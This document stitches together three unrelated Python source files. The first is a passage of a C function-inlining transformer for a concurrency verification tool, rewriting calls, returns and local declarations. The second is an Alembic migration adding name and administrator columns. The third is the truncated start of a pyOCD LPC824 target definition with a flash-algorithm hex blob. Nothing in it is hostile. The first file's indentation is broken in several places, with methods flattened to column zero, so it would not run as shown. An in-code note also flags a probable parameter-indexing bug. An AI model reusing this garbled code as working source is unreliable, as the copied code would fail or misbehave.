self.addInputParam('nondet-static', 'use default backend support of nondet static variables', '', False, True)
    def loadfromstring(self, string, env):
        """Read module options and the unwind bound, then parse ``string``."""
        if self.getInputParamValue('keepstaticarray') is not None:
            self.keepstaticarray = True
        if self.getInputParamValue('atomicparameter') is not None:
            self.atomicparameter = True
        if 'unwind' in env.paramvalues:
            # Recursion is inlined at most 'unwind' times.
            self.recursivebound = int(env.paramvalues['unwind'])
        if self.getInputParamValue('nondet-static') is not None:
            self.__nondet_static = True
        # NOTE(review): super(self.__class__, ...) breaks under further
        # subclassing; super(inliner, self) would be safer.
        super(self.__class__, self).loadfromstring(string, env)
    ''' Check whether or not the input source code has been fully inlined,
        i.e. whether every function defined in the original source code has been inlined,
        or the function inlining bound has been met.
    '''
    def inlined(self):
        # TODO: not implemented yet — always returns None.
        pass
def visit_UnaryOp(self, n):
operand = self._parenthesize_unless_simple(n.expr)
#print "N.OP %s" % n.op
#print "OPERAND: %s" % operand
#print "STACK: %s" % str(self.parametersToRemoveStack[-1])
#
if n.op == 'p++':
return '%s++' % operand
elif n.op == 'p--':
return '%s--' % operand
elif n.op == 'sizeof':
# Always parenthesize the argument of sizeof since it can be
# a name.
return 'sizeof(%s)' % self.visit(n.expr)
elif n.op == '*' and len(self.switchTo) > 0 and operand in self.switchTo[-1]:
return self.switchTo[-1][operand]
else:
return '%s%s' % (n.op, operand)
    def visit_Compound(self, n):
        """Generate a compound block, inlining statements as needed.

        While visiting, tracks whether the enclosing function contains an
        __CSEQ_atomic_begin without touching global memory — such functions
        are flagged as mergeable in ``__canbemerged``.
        """
        s = self._make_indent() + '{\n'
        self.indent_level += 1
        if n.block_items:
            globalMemoryAccessed = False
            if len(self.currentFunction) > 0:
                self.__canbemerged[self.currentFunction[-1]] = False
            for stmt in n.block_items:
                # Reset the per-statement flags; the visitors triggered by
                # _inlineIfNeeded() update them as a side effect.
                self.__globalMemoryAccessed = False
                self.__hasatomicbegin = False
                k = self._inlineIfNeeded(stmt)
                globalMemoryAccessed = self.__globalMemoryAccessed
                if self.__hasatomicbegin and not globalMemoryAccessed and len(self.currentFunction) > 0:
                    self.__canbemerged[self.currentFunction[-1]] = True
                s += k
        self.indent_level -= 1
        s += self._make_indent() + '}\n'
        return s
def __isGlobal(self, f, v):
if (v in self.Parser.varNames[''] and v not in self.Parser.varNames[f]): return True
else: return False
def visit_ID(self, n):
# If this ID corresponds either to a global variable,
# or to a pointer...
#
if (self.__isGlobal(self.currentFunction[-1], n.name) and not
n.name.startswith('__cs_thread_local_')):
self.__globalMemoryAccessed = True
return n.name
def visit_ExprList(self, n):
visited_subexprs = []
for expr in n.exprs:
if isinstance(expr, pycparser.c_ast.ExprList):
visited_subexprs.append('{' + self.visit(expr) + '}')
else:
visited_subexprs.append(self.visit(expr))
if visited_subexprs not in self.currentFunctionParams:
self.currentFunctionParams.append(visited_subexprs)
return ', '.join(visited_subexprs)
    def visit_FuncDef(self, n):
        """Emit a function definition.

        Definitions of inlined functions disappear entirely (except thread
        functions and referenced functions). Thread functions and main() get
        a trailing "__exit_<name>: ; pthread_exit(arg);" epilogue that the
        converted return/pthread_exit statements jump to.
        """
        # Function definitions of inlined functions must disappear (except thread functions).
        if self.____needsInlining(n.decl.name) and n.decl.name not in self.Parser.threadName and n.decl.name not in self.Parser.funcReferenced:
            return ''
        self.currentFunction.append(n.decl.name)
        decl = self.visit(n.decl)
        self.indent_level = 0
        body = self.visit(n.body)
        # At the bottom of each thread (and main), add the exit label and a
        # pthread_exit() call with the preserved exit argument (default '0').
        returnStmt = ''
        if (self.currentFunction[-1] in self.Parser.threadName or self.currentFunction[-1] == 'main'):
            if self.currentFunction[-1] not in self.__exit_args:
                self.__exit_args[self.currentFunction[-1]] = '0'
            returnStmt = self.INDENT_SPACING + '__exit_%s: ; %s(%s);\n' % (
                self.currentFunction[-1],
                core.common.changeID['pthread_exit'],
                self.__exit_args[self.currentFunction[-1]])
        # K&R-style parameter declarations, if any; the epilogue is spliced
        # in just before the function's closing brace.
        if n.param_decls:
            knrdecls = ';\n'.join(self.visit(p) for p in n.param_decls)
            body = body[:body.rfind('}')] + self._make_indent() + returnStmt + '}'
            block = decl + '\n' + knrdecls + ';\n' + body + '\n'
        else:
            body = body[:body.rfind('}')] + self._make_indent() + returnStmt + '}'
            block = decl + '\n' + body + '\n'
        self.currentFunction.pop()
        return block
''' Labels in inlined function needs to be renamed, the label needs to be unique in a function scope
TRUC: todo 3
'''
def visit_Goto(self, n):
if len(self.currentFunction) > 0 and self.____needsInlining(self.currentFunction[-1]):
count = 0 if self.currentFunction[-1] not in self.funcInlinedCount else self.funcInlinedCount[self.currentFunction[-1]] - 1
newlabel = n.name + '_' + self.currentFunction[-1] + '_' + str(count)
return 'goto ' + newlabel + ';'
else:
return 'goto ' + n.name + ';'
'''
'''
    def visit_FuncCall(self, n):
        """Render a function call, inlining the callee's body when required.

        pthread_exit() calls become jumps to the thread's exit label (the
        exit argument is preserved in ``__exit_args``). Inlined bodies are
        accumulated in ``inlinedStack`` to be emitted before the statement;
        the call itself is replaced by the __cs_retval_* variable (or the
        'DELETETHIS' placeholder for void functions — presumably stripped
        downstream, TODO confirm).
        """
        self.currentFunctionParams = []
        fref = self._parenthesize_unless_simple(n.name)
        # pthread_exit()s can only be within thread functions,
        # no need to check whether we're in a thread.
        if fref == core.common.changeID['pthread_exit']:
            args = self.visit(n.args)
            self.__exit_args[self.currentFunction[-1]] = args
            return 'goto __exit_%s ' % (self.currentFunction[-1])
        if fref == '__CSEQ_atomic_begin':
            self.__hasatomicbegin = True
        args = self.visit(n.args)
        s = fref + '(' + args + ')'
        if n.args is None:
            self.currentFunctionParams.append([])
        if self.____needsInlining(fref):
            if fref not in self.funcInlinedCount:
                self.funcInlinedCount[fref] = 0
            self.funcInlinedCount[fref] += 1
            self.indexStack.append('_%s_%s' % (fref, self.funcInlinedCount[fref]))
            reachBound = False
            if self._is_recursive(fref) and self.funcInlinedCount[fref] > self.recursivebound:
                # Recursion bound hit: cut this path with an assume(0).
                self.inlinedStack[-1] += '__CSEQ_assume(0);\n'
                reachBound = True
            else:
                self.inlinedStack[-1] += (self._inlineFunction(self.Parser.funcASTNode[fref], n, False)) + '\n'
            if self.Parser.funcIsVoid[fref]:
                s = 'DELETETHIS'
            else:
                if reachBound:
                    # The value of the previous expansion stands in for the cut call.
                    tempIndex = '_%s_%s' % (fref, self.funcInlinedCount[fref] - 1)
                    s = '__cs_retval_%s' % tempIndex
                    # reset inline count
                    self.funcInlinedCount[fref] = 0
                else:
                    s = '__cs_retval_%s' % (self.indexStack[-1])
            self.indexStack.pop()
        return s
'''
'''
'''
def visit_Return(self, n):
if self.currentFunction[-1] in self.Parser.threadName:
return 'goto __exit_%s; /* return stmt */' % (self.currentFunction[-1])
#return 'goto _RETURN_exit_%s_%s;' % (self.currentFunction, self.funcInlinedCount[self.currentFunction])
elif self.currentFunction[-1] == 'main':
return 'goto __exit_main; /* return stmt in main() */'
s = 'return'
if n.expr: s += ' ' + self.visit(n.expr)
return s + ';'
'''
def visit_Return(self, n):
    """Rewrite 'return' according to the current inlining/thread context.

    Inside an inlined body (indexStack non-empty): becomes a goto to the
    indexed exit label, storing the value in __cs_retval_<index> first for
    non-void callees. Inside a thread function or main(): becomes a goto to
    the function's own __exit label, remembering the returned expression in
    self.__exit_args. Otherwise: a plain return statement.
    """
    if len(self.indexStack) > 0:
        if self.Parser.funcIsVoid[self.currentFunction[-1]]:
            return 'goto __exit_%s;' % (self.indexStack[-1]) # void
        else:
            return '__cs_retval_%s = %s; goto __exit_%s;' % (self.indexStack[-1], self.visit(n.expr), self.indexStack[-1]) # non-void
    if self.currentFunction[-1] in self.Parser.threadName:
        # A thread's return value ('0' when absent) is kept for pthread_join.
        args = self.visit(n.expr) if n.expr else '0'
        self.__exit_args[self.currentFunction[-1]] = args
        return 'goto __exit_%s; ' % (self.currentFunction[-1])
    elif self.currentFunction[-1] == 'main':
        self.__exit_args[self.currentFunction[-1]] = '0'
        return 'goto __exit_main; '
    s = 'return'
    if n.expr: s += ' ' + self.visit(n.expr)
    return s + ';'
''' TODO: labels inside inlined functions must be indexed using indexStack
'''
'''
def visit_Label(self, n):
if self.currentFunction in self.__functionsToBeInlined:
return n.name + self.indexStack[-1] + ':\n' + self._generate_stmt(n.stmt)
else:
return n.name + ':\n' + self._generate_stmt(n.stmt)
'''
''' TODO gotos-to-labels inside inlined functions must be indexed using indexStack
'''
'''
def visit_Goto(self, n):
if self.currentFunction in self.__functionsToBeInlined:
return 'goto ' + n.name + self.indexStack[-1] + '; /* updated label index from previous goto stmt */'
else:
return 'goto ' + n.name + ';'
'''
def visit_Struct(self, n):
    """Render a struct declaration/definition.

    The __parsingStruct flag is raised while the members are generated so
    that visit_Decl leaves member declarations untouched; the previous flag
    value is restored afterwards (structs may nest).
    """
    previous_flag = self.__parsingStruct
    self.__parsingStruct = True
    rendered = self._generate_struct_union(n, 'struct')
    self.__parsingStruct = previous_flag
    return rendered
@staticmethod
def _initVar(varType, varName, varTypeUnExpanded):
    """Return a C statement giving *varName* a nondeterministic initial value.

    Known primitive types map to the matching __CSEQ_nondet_*() call;
    pthread-related types need no initialisation (empty string); anything
    else falls back to byte-wise __cs_init_scalar().
    (varTypeUnExpanded is accepted for interface compatibility but unused.)
    """
    nondet_call = {
        'int': '__CSEQ_nondet_int',
        'unsigned int': '__CSEQ_nondet_uint',
        '_Bool': '__CSEQ_nondet_bool',
        'bool': '__CSEQ_nondet_bool',
        'char': '__CSEQ_nondet_char',
        'unsigned char': '__CSEQ_nondet_uchar',
        'unsigned long': '__CSEQ_nondet_uint',
    }
    pthread_types = ('__cs_t', '__cs_mutex_t', '__cs_cond_t',
                     '__cs_barrier_t', '__cs_attr_t')
    if varType in nondet_call:
        return '%s = %s()' % (varName, nondet_call[varType])
    if varType in pthread_types:
        return ''
    return '__cs_init_scalar(&%s, sizeof(%s))' % (varName, varType)
def _hasBeenAssignedLater(self, varname):
    """True when *varname* is recorded as assigned right after its declaration
    in the current function scope, so its nondet initialisation can be
    skipped (covers immediate assignments and for-loop header variables).
    """
    if not self.currentFunction:
        return False
    scope = self.currentFunction[-1]
    if scope == '':
        return False
    return (scope in self.Parser.varNoNeedInit and
            varname in self.Parser.varNoNeedInit[scope])
def _needInit(self, varname):
    """Decide whether a declaration needs an explicit (nondet) initialiser.

    Compiler-generated temporaries from earlier transformation passes are
    always assigned before use, as are variables known to be assigned right
    after declaration; both groups are skipped.
    """
    generated_markers = (
        '__cs_switch_cond',       # from switchtransformer.py
        '__cs_tmp_if_cond_',      # from extractor.py
        '__cs_tmp_while_cond_',   # from extractor.py
        '__cs_tmp_for_cond_',     # from extractor.py
        '__cs_dowhile_onetime_',  # from remover.py
    )
    if any(marker in varname for marker in generated_markers):
        return False
    return not self._hasBeenAssignedLater(varname)
def visit_Decl(self, n, no_type=False):
    """Render a declaration, turning function-local variables into statics
    so their values survive simulated context switches.

    no_type is used when a Decl is part of a DeclList, where the type is
    explicitly only for the first declaration in a list.
    """
    s = n.name if no_type else self._generate_decl(n)
    if n.bitsize:
        s += ' : ' + self.visit(n.bitsize)
    # Declarations of constant variables need no transformation.
    if "const" in s.split():
        if n.init:
            s += '=' + self.visit(n.init)
        return s
    # Change local variables to be static vars, needed for this particular
    # encoding to remember the old values of local variables between
    # simulated context switches.
    #
    # If the variable is scalar or an array of fixed size, just add 'static'.
    # If the variable is an array of non-fixed size, change it to a static
    # pointer and add a malloc() call to complete the initialization,
    # (e.g. int x[size]; --> static int * x; x = (int *)malloc(sizeof(int)*size);)
    #
    # TODO: init_scalar()/malloc() should not be called when variables have init expressions!
    #
    processInit = False # Has processed the init expression
    if (isinstance(n, c_ast.Decl) and           # it is a declaration
            self.currentFunction[-1] != '' and  # not a global declaration
            self.indent_level > 0 and
            not s.startswith('static ') and     # not already static
            not self.__parsingStruct):          # and not part of a struct
        if ((self.__isScalar(self.currentFunction[-1], n.name) or
                self.__isStruct(self.currentFunction[-1], n.name)) and
                # scalar/struct with no init expression recorded by the parser
                not self.Parser.varInitExpr[self.currentFunction[-1], n.name]):
            s = 'static ' + s # declaration
            if n.init: # this variable has an init expression after all
                processInit = True
                if isinstance(n.init, c_ast.InitList):
                    s += ' = {' + self.visit(n.init) + '}'
                elif isinstance(n.init, c_ast.ExprList):
                    # init moved to a separate assignment: statics can only
                    # have constant initialisers.
                    s += '; %s = (' % n.name + self.visit(n.init) + ')'
                else:
                    s += '; %s = ' % n.name + self.visit(n.init)
            else: # no init: give it a nondeterministic initial value
                if self.__isScalar(self.currentFunction[-1], n.name):
                    varType = self.Parser.varType[self.currentFunction[-1], n.name]
                    varTypeUnExpanded = self.Parser.varTypeUnExpanded[self.currentFunction[-1], n.name]
                    initialStmt = '; ' + self._initVar(varType, n.name, varTypeUnExpanded) if self._needInit(n.name) else ''
                    s += initialStmt
                elif self.__isStruct(self.currentFunction[-1], n.name):
                    s += ''
                else: ## what can it be?
                    s += '; __cs_init_scalar(&%s, sizeof(%s))' % (
                        n.name, self.Parser.varType[self.currentFunction[-1], n.name])
        elif (self.__isScalar(self.currentFunction[-1], n.name) and
                # scalar with a recorded init expression
                self.Parser.varInitExpr[self.currentFunction[-1], n.name]):
            s = 'static ' + s
            if n.init:
                processInit = True
                if isinstance(n.init, c_ast.InitList):
                    s += ' = {' + self.visit(n.init) + '}'
                elif isinstance(n.init, c_ast.ExprList):
                    s += '; %s = (' % n.name + self.visit(n.init) + ')'
                else:
                    s += '; %s = ' % n.name + self.visit(n.init)
            else:
                varType = self.Parser.varType[self.currentFunction[-1], n.name]
                varTypeUnExpanded = self.Parser.varTypeUnExpanded[self.currentFunction[-1], n.name]
                initialStmt = '; ' + self._initVar(varType, n.name, varTypeUnExpanded) if self._needInit(n.name) else ''
                s += initialStmt
        elif self.__isArray(self.currentFunction[-1], n.name):
            # Two cases:
            # 1. the array has a compound (brace) initializer
            # 2. anything else
            init = ''
            initType = 0
            if n.init:
                processInit = True
                if isinstance(n.init, c_ast.InitList):
                    init = ' = {' + self.visit(n.init) + '}'
                    initType = 1
                elif isinstance(n.init, c_ast.ExprList):
                    init = ' = (' + self.visit(n.init) + ')'
                    initType = 0
                else:
                    init = ' = ' + self.visit(n.init)
                    initType = 0
            if initType == 1:
                # Case 1
                s = 'static ' + s + init
            else:
                # Anything else
                if processInit:
                    if self._is_dynamic_size_array(self.currentFunction[-1], n.name):
                        s = 'static ' + s + init
                    else:
                        s = 'static ' + s + '; %s' % n.name + init
                else:
                    if self.keepstaticarray:
                        s = 'static ' + s
                    else:
                        # non-fixed-size array: static pointer + malloc
                        stars = '*' * self.Parser.varArity[self.currentFunction[-1], n.name]
                        vartype = self.Parser.varType[self.currentFunction[-1], n.name]
                        s = 'static %s %s %s; ' % (vartype, stars, n.name)
                        s += n.name + ' = (%s %s) %s(sizeof(%s)*%s)' % (vartype, stars, core.common.changeID['malloc'], vartype, self._totalSize(self.currentFunction[-1], n.name))
        else: # anything else
            init = ''
            initType = 0
            if n.init:
                processInit = True
                if isinstance(n.init, c_ast.InitList):
                    init = ' = {' + self.visit(n.init) + '}'
                    initType = 1
                elif isinstance(n.init, c_ast.ExprList):
                    init = ' = (' + self.visit(n.init) + ')'
                    initType = 0
                else:
                    init = ' = ' + self.visit(n.init)
                    initType = 0
            if initType == 1:
                s = 'static ' + s + init
            else:
                if processInit:
                    if self._is_dynamic_size_array(self.currentFunction[-1], n.name):
                        s = 'static ' + s + init
                    else:
                        s = 'static ' + s + '; %s' % n.name + init
                else:
                    s = 'static ' + s + '; __cs_init_scalar(&%s, sizeof(%s))' % (
                        n.name, self.Parser.varType[self.currentFunction[-1], n.name])
    # Global variables and already-static variables keep an inline initializer.
    if n.init and not processInit:
        if isinstance(n.init, c_ast.InitList):
            s += ' = {' + self.visit(n.init) + '}'
        elif isinstance(n.init, c_ast.ExprList):
            s += ' = (' + self.visit(n.init) + ')'
        else:
            s += ' = ' + self.visit(n.init)
    return s
''' OMAR CODE
def visit_Decl(self, n, no_type=False):
# no_type is used when a Decl is part of a DeclList, where the type is
# explicitly only for the first delaration in a list.
#
s = n.name if no_type else self._generate_decl(n)
if n.bitsize: s += ' : ' + self.visit(n.bitsize)
# Change local variables to be static vars,
# needed for this particular encoding to remember the old values of local variables
# between simulated context switches.
#
# If the variable is scalar or it is an array of fixed size, then just add static to its declaration.
# If the variable is an array of non fixed size, then change it to a static pointer and adds a call to malloc() to complete the initialization,
# (e.g. int x[size]; --> static int * x; x = (int *)malloc(sizeof(int)*size); )
#
# TODO: init_scalar()/malloc() should not be called when variables have init expressions!
#
nondet_function = {}
nondet_function['int'] = "__CSEQ_nondet_int()"
nondet_function['unsigned int'] = "__CSEQ_nondet_uint()"
nondet_function['_Bool'] = "__CSEQ_nondet_bool()"
nondet_function['char'] = "__CSEQ_nondet_char()"
nondet_function['unsigned char'] = "__CSEQ_nondet_uchar()"
if (isinstance(n, c_ast.Decl) and
self.currentFunction[-1] != '' and
self.indent_level > 0 and
not s.startswith('static ') and
not self.__parsingStruct):
if (self.__isScalar(self.currentFunction[-1], n.name) or self.__isStruct(self.currentFunction[-1], n.name)) and not self.Parser.varInitExpr[self.currentFunction[-1], n.name]:
#if self.__isScalar(self.currentFunction[-1], n.name) and not self.Parser.varInitExpr[self.currentFunction[-1], n.name]:
vartype = self.Parser.varType[self.currentFunction[-1], n.name]
# if vartype not in ("int", "unsigned int", "_Bool", "char", "unsigned char", ):
s = 'static ' + s + '; __cs_init_scalar(&%s, sizeof(%s))' % (n.name, vartype)
# else:
# s = 'static ' + s + '; %s = %s' % (n.name, nondet_function[vartype])
#s = 'static ' + s + '; malloc(&%s, sizeof(%s))' % (n.name, self.Parser.varType[self.currentFunction[-1], n.name])
elif self.__isScalar(self.currentFunction[-1], n.name) and self.Parser.varInitExpr[self.currentFunction[-1], n.name]:
s = 'static ' + s
elif self.__isArray(self.currentFunction[-1], n.name):
stars = '*' * self.Parser.varArity[self.currentFunction[-1], n.name]
vartype = self.Parser.varType[self.currentFunction[-1],n.name]
s = 'static %s %s %s; ' % (self.Parser.varType[self.currentFunction[-1], n.name], stars, n.name)
s += n.name + ' = (%s %s)malloc(sizeof(%s)*%s); __CSEQ_assume(%s)' % (vartype, stars, vartype, self._totalSize(self.currentFunction[-1], n.name), n.name)
if n.init:
if isinstance(n.init, c_ast.InitList):
s += ' = {' + self.visit(n.init) + '}'
elif isinstance(n.init, c_ast.ExprList):
s += ' = (' + self.visit(n.init) + ')'
else:
s += ' = ' + self.visit(n.init)
return s
'''
# def visit_Label(self, n):
# # Truc (method 1: simply add an empty statement)
# return n.name + ':;\n' + self._generate_stmt(n.stmt)
########################################################################################
def _inlineIfNeeded(self, stmt):
    """Generate *stmt*, prepending any function bodies that visiting it
    caused to be inlined (collected on inlinedStack by visit_FuncCall).

    Labelled statements get special care: the label is re-indexed when the
    enclosing function is itself being inlined, and is detached from the
    statement ('label:;') when inlined code must sit between the two.
    """
    self.inlinedStack.append('')
    original = ''
    if isinstance(stmt, pycparser.c_ast.Label):
        label = stmt.name
        if len(self.currentFunction) > 0 and self.____needsInlining(self.currentFunction[-1]):
            # Index the label with the current inline count of the enclosing
            # function, matching the renaming done for its goto statements.
            count = 0 if self.currentFunction[-1] not in self.funcInlinedCount else self.funcInlinedCount[self.currentFunction[-1]] - 1
            label = label + '_' + self.currentFunction[-1] + '_' + str(count)
        original = self._generate_stmt(stmt.stmt)
        if self.inlinedStack[-1] == '': # no inlined function call inside this statement
            original = label + ':\n' + original
        else:
            # Drop void-call placeholders, then emit label, inlined bodies,
            # and finally the labelled statement itself.
            original = original.replace('DELETETHIS;\n', '')
            original = label + ':;\n' + self.inlinedStack[-1] + original
    else:
        original = self._generate_stmt(stmt)
        original = original.replace('DELETETHIS;\n', '')
        original = self.inlinedStack[-1] + original
    self.inlinedStack.pop()
    return original
''' Generate the function body,
for either including it in a function definition, or
for inserting it into a statement
'''
def _inlineFunction(self, n, fcall_ast_node, simple):
    """Return the body of function *n* (its AST) rewritten for splicing at
    the call site *fcall_ast_node*:

      1. simulated parameter passing is prepended (static locals + assignments),
      2. a 'static ... __cs_retval_<index>' is emitted for non-void callees,
      3. an '__exit_<index>' label is appended at the bottom; return
         statements inside the body are turned into gotos to it by
         visit_Return while the body is visited.

    Side effects: pushes/pops parametersToRemoveStack, switchTo and
    currentFunction; trims self.lines back after visiting the body so the
    line mapping is regenerated on every inlining of the same function.
    """
    fInput = fOutput = ''
    fref = n.decl.name
    # Simulate input parameter passing.
    #
    # Analysis of function-call parameters: an argument of the form '&g'
    # where g is a global (not shadowed locally) and the matching formal
    # parameter is always dereferenced in the callee can be dropped; the
    # callee then uses g directly (recorded in switchTo).
    self.parametersToRemoveStack.append([])
    self.switchTo.append({})
    if fcall_ast_node.args is not None:
        paramNo = -1
        for expr in fcall_ast_node.args.exprs: # for each parameter in the function call
            paramNo += 1
            if (isinstance(expr, pycparser.c_ast.UnaryOp) and
                    expr.op == '&' and
                    expr.expr.name not in self.Parser.varNames[self.currentFunction[-1]] and
                    expr.expr.name in self.Parser.varNames[''] and
                    len(self.Parser.varOccurrence[fref, self.Parser.funcParams[fref][paramNo]]) - len(self.Parser.varDeReferenced[fref,self.Parser.funcParams[fref][paramNo]]) == 0):
                # this argument to fref() can be removed ...
                self.parametersToRemoveStack[-1].append('&'+expr.expr.name)
                # ... and in the body (*param) is replaced by the global itself
                self.switchTo[-1][self.Parser.funcParams[fref][paramNo]] = expr.expr.name
    if fcall_ast_node.args is not None:
        i = 0
        for p in self.Parser.varNames[fref]:
            if self.Parser.varKind[fref,p] == 'p':
                if self.currentFunctionParams[-1][i] in self.parametersToRemoveStack[-1]:
                    i += 1
                    continue # this parameter is not needed
                if not self.__isPointerToFunction(fref,p) and not self.__isArray(fref,p):
                    # plain scalar/struct parameter
                    fInput += 'static %s %s; %s = %s; ' % (self.Parser.varTypeUnExpanded[fref,p], p, p, self.currentFunctionParams[-1][i])
                    i += 1
                elif not self.__isPointerToFunction(fref,p) and self.__isArray(fref,p):
                    # array parameter: decays to one '*' per declared dimension
                    varSize = ''
                    stars = ''
                    '''
                    for s in self.Parser.varSize[fref,p]:
                        if s != -1: varSize += '[%s]' % s
                        else: varSize += '[]'
                    '''
                    for s in self.Parser.varSize[fref,p]:
                        stars += '*'
                    fInput += 'static %s %s%s; %s = %s; ' % (self.Parser.varTypeUnExpanded[fref,p], stars, p, p, self.currentFunctionParams[-1][i])
                    # NOTE(review): unlike the other two branches this one does
                    # not advance i — looks like a latent argument/parameter
                    # misalignment when an array parameter precedes others;
                    # confirm against the original (pre-mangling) sources.
                else:
                    # pointer-to-function parameter: splice the name into '(*)'
                    x = self.Parser.varTypeUnExpanded[fref,p].replace('(*)', '(*%s)' % p)
                    fInput += 'static %s; %s = %s; ' % (x, p, self.currentFunctionParams[-1][i])
                    i += 1
    # Simulate output parameter returning.
    #
    if not self.Parser.funcIsVoid[fref]:
        fOutput = 'static %s __cs_retval_%s;\n' % (self.Parser.funcBlockOut[fref], self.indexStack[-1])
    else: # simple function call without assignment (e.g. f(x);)
        fOutput = ''
    # dirty fix: just include the line map of that function call
    fOutput = self._getCurrentCoords(fcall_ast_node) + '\n' + fOutput
    # Transform the function body by:
    #
    # 1. adding the initialization statement(s) (if any) at the top
    # 2. adding one exit label at the bottom where to jump to in order to simulate return statements
    # 3. change return statements to goto statements pointing to the exit label added in previous step
    # 4. all the rest is unchanged
    #
    self.currentFunction.append(fref)
    # save the old length so after the inlining self.lines can be trimmed back
    # to its contents before the inlining; this removes the elements added
    # while inlining, otherwise when inlining the same function more than
    # once the linemapping is only generated on the first inlined call.
    oldlineslen = len(self.lines)
    inlined = self.visit(self.Parser.funcASTNode[fref].body)
    self.functionlines[fref] = self.lines[oldlineslen:]
    self.lines = self.lines[:oldlineslen]
    # top: drop the body's opening brace, then prepend retval decl + fInput
    inlined = inlined[inlined.find('{')+1:]
    if self.atomicparameter:
        # wrap the simulated parameter passing in an atomic section
        fInput = '__CSEQ_atomic_begin();' + fInput
        if fref in self.__canbemerged and self.__canbemerged[fref]:
            # merge with the atomic section the body itself begins with
            inlined = inlined.replace('__CSEQ_atomic_begin()', '', 1)
        else:
            fInput += '__CSEQ_atomic_end();'
    addedheader = self.INDENT_SPACING + fOutput + self._make_indent() + '{\n' + self._make_indent(1) + fInput
    inlined = addedheader + inlined
    # bottom: exit label right before the closing brace
    inlined = inlined[:inlined.rfind('}')] + '%s __exit_%s: ; \n' % (self._make_indent(1), self.indexStack[-1]) + self._make_indent() +'}\n'
    self.parametersToRemoveStack.pop()
    self.switchTo.pop()
    self.currentFunction.pop()
    return inlined
# Shift one indent each line.
#
def _shiftIndent(self, s):
    """Return *s* with one extra indentation level prepended to every line
    (each line is re-terminated with a newline)."""
    return ''.join(self.INDENT_SPACING + line + '\n' for line in s.splitlines())
''' Check whether variable v from function f has a fixed size,
or not (e.g. int x[expr] with expr not constant.
'''
def _hasFixedSize(self, f, v):
    """True iff every declared dimension of variable v in function f is a
    plain numeric literal (non-arrays trivially count as fixed-size)."""
    return all(self.Parser.varSize[f, v][i].isdigit()
               for i in range(self.Parser.varArity[f, v]))
''' Return the total size of a given array in a string,
as the expression of the product of all sizes.
For example:
int x[10][expr][3];
returns:
size = 10*(expr)*30;
'''
def _totalSize(self, f, v):
    """Return the total element count of array v in f as a C expression:
    the '*'-joined product of all its dimensions, e.g.
    int x[10][expr][3] -> '10*expr*3'."""
    dims = [str(self.Parser.varSize[f, v][i])
            for i in range(self.Parser.varArity[f, v])]
    return '*'.join(dims)
# Checks whether variable v from function f is an array.
#
def __isArray(self, f, v):
    """1 iff variable v in function f was declared with at least one array
    dimension, else 0 (ints to match the sibling __is* predicates)."""
    return 1 if self.Parser.varArity[f, v] > 0 else 0
# Checks whether variable v from function f is scalar.
# TODO redo properly at parser-level
#
def __isScalar(self, f, v):
    """1 iff variable v in function f is a non-array, non-struct, non-union
    variable, else 0.  TODO redo properly at parser-level."""
    if self.Parser.varArity[f, v] != 0:
        return 0
    vtype = self.Parser.varType[f, v]
    if vtype.startswith('struct ') or vtype.startswith('union '):
        return 0
    return 1
# Checks whether variable v from function f is a struct.
# TODO redo properly at parser-level
#
def __isStruct(self, f, v):
    """1 iff variable v in function f has a 'struct ...' type, else 0.
    TODO redo properly at parser-level."""
    return 1 if self.Parser.varType[f, v].startswith('struct ') else 0
def __isPointerToFunction(self, f, v):
    """True iff variable v in function f was parsed as a function pointer."""
    return (f, v) in self.Parser.varPtrToFunct
''' Check whether function f needs to be inlined.
'''
def ____needsInlining(self, f):
    """Decide whether a call to *f* must be inlined: only functions defined
    in the input program qualify, excluding atomic-section helpers, the
    assert stub, the empty (global) scope and main()."""
    if f not in self.Parser.funcBlock:
        return False  # only defined functions can be inlined when called
    if f.startswith('__CSEQ_atomic') or f == '__CSEQ_assert':
        return False
    return f != '' and f != 'main'
def _is_dynamic_size_array(self, f, v):
    """True iff (f, v) is a known variable declared as a one-dimensional
    array whose size is not fixed (recorded as -1 by the parser)."""
    if (f, v) not in self.Parser.varID:
        return False
    return (self.Parser.varArity[f, v] == 1 and
            self.Parser.varSize[f, v][0] == -1)
def _is_recursive(self, fname):
    """Heuristically decide whether *fname* takes part in recursion.

    Direct recursion: fname occurs in its own call-reference set.
    Indirect recursion: the call-reference set of fname intersects the set
    of functions whose call-reference sets contain fname.
    """
    if fname not in self.Parser.callReferences:  # defensive; should not happen
        return False
    related = self.Parser.callReferences[fname]
    if fname in related:  # calls itself
        return True
    counterparts = set()
    for other in self.Parser.callReferences:
        if other != fname and fname in self.Parser.callReferences[other]:
            counterparts.add(other)
    return bool(set(related) & counterparts)
|
"""Add admin to User, name to RepoGroup
Revision ID: a051167419fa
Revises: 2eaa930b1f5a
Create Date: 2019-02-17 13:09:42.138936
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'a051167419fa'       # this migration's id
down_revision = '2eaa930b1f5a'  # immediate parent in the migration chain
branch_labels = None
depends_on = None
def upgrade():
    """Apply: add nullable RepoGroup.name and User.administrator columns."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.add_column('repo_group', sa.Column('name', sa.String(length=128), nullable=True))
    op.add_column('user', sa.Column('administrator', sa.Boolean(), nullable=True))
    # ### end Alembic commands ###
def downgrade():
    """Revert: drop the columns added by this revision (reverse order)."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_column('user', 'administrator')
    op.drop_column('repo_group', 'name')
    # ### end Alembic commands ###
|
# pyOCD debugger
# Copyright (c) 2006-2013 Arm Limited
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ...flash.flash import Flash
from ...coresight.coresight_target import CoreSightTarget
from ...core.memory_map import (FlashRegion, RamRegion, MemoryMap)
from ...debug.svd.loader import SVDFile
# Flash programming algorithm for the LPC824 on-chip flash.
# 'instructions' is a position-independent Thumb machine-code blob loaded
# into RAM at 'load_address'; the pc_* entries are entry points inside it.
FLASH_ALGO = {
    'load_address' : 0x10000000,
    'instructions' : [
    0xE00ABE00, 0x062D780D, 0x24084068, 0xD3000040, 0x1E644058, 0x1C49D1FA, 0x2A001E52, 0x4770D1F2,
    0x47700a80, 0x21004842, 0x22016301, 0x63416342, 0x6b416342, 0xd0fc07c9, 0x493e6382, 0x70082002,
